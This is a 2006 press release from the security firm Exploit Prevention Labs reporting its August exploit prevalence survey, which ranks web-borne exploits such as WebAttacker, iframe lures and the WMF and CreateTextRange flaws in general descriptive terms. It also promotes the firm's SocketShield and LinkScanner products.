Exploit Prevention Labs
Home
  Products
  Threat Center
  Support
  About Us
  Media Center
  Contact Us
 
Quick Links
In the News
Press Releases

 

 
Media Center

Press Releases

EXPLOIT PREVENTION LABS RELEASES AUGUST EXPLOIT PREVALENCE SURVEY

Survey Adds Tracking the Prevalence of Orphaned Lure Sites

September 12, 2006 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), the leading developer of anti-exploit software, today released findings for its August 2006 Exploit Prevalence Survey™. Now in its fourth month, the Exploit Prevalence Survey is the first monthly survey to measure the top web-borne exploits based on real-world prevalence data. Results are derived from automated reports submitted by users of Exploit Prevention Labs’ SocketShield anti-exploit software, combined with exploit distribution data captured from the company’s popular LinkScanner online URL scanning service and network of automated hunting-pots.

New to this month’s report is tracking of orphaned lure sites. Orphaned lures are trusted web sites that have been hacked and which contain IFRAME links that call out to exploit servers that are dead or dormant. An IFRAME is a common HTML tag, and is the primary mechanism used by cyber criminals to infect web site visitors with exploits via drive-by downloads. When a user with an unpatched system hits the site, the IFRAME command causes the user’s browser to silently connect to another server, often an exploit server, which then attempts to force-download exploit code onto the user’s computer.

“Although these sites are not actively serving exploits right now, we keep a close eye on them because cyber criminals frequently reactivate their exploit servers at a later date,” said Roger Thompson, CTO of Exploit Prevention Labs and the survey’s primary author. “The orphaned lures are also interesting because the site owners remain oblivious to the fact that they’ve been hacked and that they most like remain vulnerable to further hacks by the exploit distributors.”

Exploit Prevalence Results for the Month of August 2006
The following is a summary of the top five most-reported web exploits for the month of August 2006:

Exploit

Rank last month

Percent of Overall Occurrences

Description

WebAttacker

2

30.36 percent

WebAttacker is a Russian-built software application, first introduced about 18 months ago, which currently launches four different exploits, including MDAC, a Firefox exploit, CreateTextRange, and an exploit for the Java Virtual Machine. Like a commercial software application, it can be purchased online – but on underground hacker web sites - for between $20 and $300, and requires minimal technical sophistication to use. Updated every few months, just like legitimate commercial software, only it is crimeware. Updated in July, most likely for bug fixes.

Iframers launcher script

1

16.81 percent

Propagated by a cybercrime organization sometimes called the CoolWebSearch gang, or the Russian iframers, this exploit is perpetrated by a cybercrime mob generally thought to be based in St. Petersburg, Russia. This organization is responsible for the Circuit City hack in early June 2006. Using a simple HTML tag called an iframe embedded on a hacked web site, the visitor’s web browser is redirected to an exploit server operated by the gang, which attempts to deposit up to eight different exploits onto the user’s computer.

WMF (CVE-2005-2124) with known payload

3

15.78 percent

Windows Metafile exploit from December 2005.  Uses a little-known feature of Windows Metafiles to execute arbitrary code, including malware.  The exploit, a genuine zero-day attack, was allegedly purchased for $5,000 from a Russian hacking group.  Seven months after Microsoft issued a patch, it’s still widely used by cybercriminals.

Orphaned Lures

New metric

9.78 percent

Orphaned lures are trusted web sites that have been hacked and which contain IFRAME links which call out to exploit servers that are currently dead or dormant.

CreateTextRange (CVE-2006-1359)

5

8.40 percent

Released March 2006.  This is a buffer overflow attack affecting Internet Explorer that enables the execution of arbitrary code, usually a downloader - a program whose job is to download and install another program such as a rootkit or a keylogger.  Patched in April by Microsoft, this exploit appears to be in decline.

Note:  Numbers above do not add up to 100 percent, due to the following less-frequently reported exploits: TriMode (7.38 percent), MDAC (6.69 percent), GromSploit (New: 4.80 percent).

Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.

For additional background information on exploits and how to protect against them, visit Exploit Prevention Lab’s comprehensive Resource Center at http://www.explabs.com/about/resCenter/index.html.

About SocketShield and LinkScanner
SocketShield (free trial: http://www.explabs.com/ss/trial.html) is the industry’s first reliable solution to protect Internet users against the growing threat of zero-day and malicious web sites that target vulnerabilities in unpatched Windows software.

SocketShield provides a critical layer of security that complements the defenses provided by traditional security solutions. Firewalls cannot stop exploits, because exploits enter within the trusted communications stream of the user’s browser connection. Anti-virus and anti-spyware applications can’t protect against exploits because they must wait for the malware code to hit the hard disk in order to detect it, and by that time most exploits have already executed their payload. Patch management systems can’t distribute a patch until the application vendor releases it. And patching as a general practice, while critical, often fails because it relies on users taking action of their own volition.

LinkScanner is a free real-time URL scanner that tells users whether a site they intend to visit has been poisoned by an exploit distribution network. LinkScanner is available at http://www.explabs.com/linkscanner/.

About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops security software to protect against Web-based exploits and malicious web sites. SocketShield, the company’s flagship product, provides patent-pending protection against zero-day exploits during the critical risk window between the announcement of a vulnerability and the provision of a patch by the vendor. Exploit Prevention Labs also offers the free LinkScanner url checker that determines whether or not a web site is distributing exploits. More information about Exploit Prevention Labs and SocketShield may be found on the company’s website at http://www.explabs.com.

###

Media Contact:
Tim Shisler
Dovetail Public Relations
408.395.3600
xpl@dovetailpr.com

 
Home  |  Products  |  Support  |  About Us  |  Privacy Policy  |  Affiliate Program
Copyright © 2008 Exploit Prevention Labs. All rights reserved.